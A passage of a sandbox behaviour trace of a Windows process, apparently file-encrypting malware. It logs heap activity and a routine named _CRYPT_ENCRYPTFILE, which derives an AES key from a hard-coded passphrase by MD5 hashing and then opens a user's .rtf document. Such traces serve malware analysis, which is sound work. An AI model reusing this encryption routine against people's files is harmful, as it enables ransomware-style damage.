hHeap=0x1780000) returned 1 [0082.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0082.651] PeekMessageW (in: lpMsg=0x144e29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e29c) returned 0 [0082.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0082.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0082.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0082.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0082.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0d8 | out: hHeap=0x1780000) returned 1 [0082.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0082.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0082.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0082.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0082.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0082.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0082.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0082.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0082.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0082.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0082.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0082.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0082.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0082.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0082.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0082.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0082.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c40 | out: hHeap=0x1780000) returned 1 [0082.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0082.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0082.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0082.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0082.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0082.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0082.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0082.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0082.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0082.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0082.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3860 | out: hHeap=0x1780000) returned 1 [0082.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a84d8 | out: hHeap=0x1780000) returned 1 [0082.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0082.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37e8 | out: hHeap=0x1780000) returned 1 [0082.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3650 | out: hHeap=0x1780000) returned 1 [0082.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37a0 | out: hHeap=0x1780000) returned 1 [0082.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3800 | out: hHeap=0x1780000) returned 1 [0082.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3668 | out: hHeap=0x1780000) returned 1 [0082.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3818 | out: hHeap=0x1780000) returned 1 [0082.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35a8 | out: hHeap=0x1780000) returned 1 [0082.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3620 | out: hHeap=0x1780000) returned 1 [0082.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0082.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0082.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0082.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1c8 | out: hHeap=0x1780000) returned 1 [0082.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2e8 | out: hHeap=0x1780000) returned 1 [0082.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b90 | out: hHeap=0x1780000) returned 1 [0082.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0082.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0082.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0082.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0082.652] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43cb348, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0082.653] CloseHandle (hObject=0x258) returned 1 [0082.653] FreeLibrary (hLibModule=0x772d0000) returned 1 [0082.653] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0082.653] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\F0N0.rtf", lpFindFileData=0x144e3c8 | out: lpFindFileData=0x144e3c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeefb1990, ftCreationTime.dwHighDateTime=0x1d5f049, ftLastAccessTime.dwLowDateTime=0x2b265b0, ftLastAccessTime.dwHighDateTime=0x1d5ec12, ftLastWriteTime.dwLowDateTime=0x2b265b0, ftLastWriteTime.dwHighDateTime=0x1d5ec12, nFileSizeHigh=0x0, nFileSizeLow=0x157d3, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="F0N0.rtf", cAlternateFileName="")) returned 0x41ac180 [0082.653] FindClose (in: hFindFile=0x41ac180 | out: hFindFile=0x41ac180) returned 1 [0082.653] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0082.653] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0082.653] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0082.653] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.653] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.654] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0082.654] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797108, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0082.654] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0082.654] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796fe8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0082.654] CryptAcquireContextA (in: phProv=0x144e0a8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e0a8*=0x41a4fa8) returned 1 [0082.654] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0082.654] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0082.654] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0082.655] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0082.655] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0082.655] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0082.655] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.655] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0082.655] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.655] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0082.655] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43c3710, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0082.655] CryptCreateHash (in: hProv=0x41a4fa8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144de18 | out: phHash=0x144de18) returned 1 [0082.655] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0082.655] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2ae8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0082.655] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0082.655] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0082.655] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2c08, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0082.655] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.655] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.655] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0082.655] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43c3608, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0082.655] CryptHashData (hHash=0x41ac6c0, pbData=0x17e2b48, dwDataLen=0x22, dwFlags=0x1) returned 1 [0082.655] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.655] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0082.656] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0082.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43c3710, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0082.656] CryptDeriveKey (in: hProv=0x41a4fa8, Algid=0x6610, hBaseData=0x41ac6c0, dwFlags=0x1, phKey=0x144de18 | out: phKey=0x144de18*=0x41ac780) returned 1 [0082.656] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.656] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0082.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796e08, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0082.656] CryptDestroyHash (hHash=0x41ac6c0) returned 1 [0082.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b80 [0082.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea958 [0082.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b50 [0082.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3a58 [0082.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3938 [0082.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c38d8 [0082.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bb0 [0082.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3a70 [0082.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3a88 [0082.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3980 [0082.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c80 [0082.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b80 [0082.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0082.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3638 [0082.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2d10 [0082.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36c8 [0082.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2d10 [0082.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3860 [0082.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bb0 [0082.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c40 [0082.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9e90 [0082.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ca0 [0082.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0082.657] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0082.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac040 | out: hHeap=0x1780000) returned 1 [0082.657] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0082.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0082.657] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0082.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bd0 [0082.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0082.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0082.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c40 [0082.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0082.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0082.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb378 [0082.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2d10 [0082.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d10 | out: hHeap=0x1780000) returned 1 [0082.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0082.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43ed3b0 [0082.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0082.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cf0 [0082.658] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\F0N0.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\-hpkoimryovvcxapkjwd\\f0n0.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0082.658] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.658] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e550 | out: lpNewFilePointer=0x0) returned 1 [0082.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0082.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0d8 [0082.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c60 [0082.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1f8 | out: hHeap=0x1780000) returned 1 [0082.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0082.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0082.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0082.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0082.658] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0082.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b30 [0082.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ca0 [0082.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c20 [0082.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0082.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0082.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0082.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ca0 | out: hHeap=0x1780000) returned 1 [0082.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b30 | out: hHeap=0x1780000) returned 1 [0082.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0082.659] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0082.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0082.659] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0082.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c40 [0082.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0082.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb120 [0082.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bd0 [0082.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb378 [0082.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0082.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0082.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ce0 [0082.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c10 [0082.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0082.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0082.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c10 | out: hHeap=0x1780000) returned 1 [0082.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ce0 | out: hHeap=0x1780000) returned 1 [0082.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0082.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c80 [0082.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb408 [0082.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c90 [0082.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3c0 [0082.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b50 [0082.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb468 [0082.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b40 [0082.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3d8 [0082.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ce0 [0082.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb480 [0082.661] RtlAllocateHeap (HeapHandle=0x1780000, 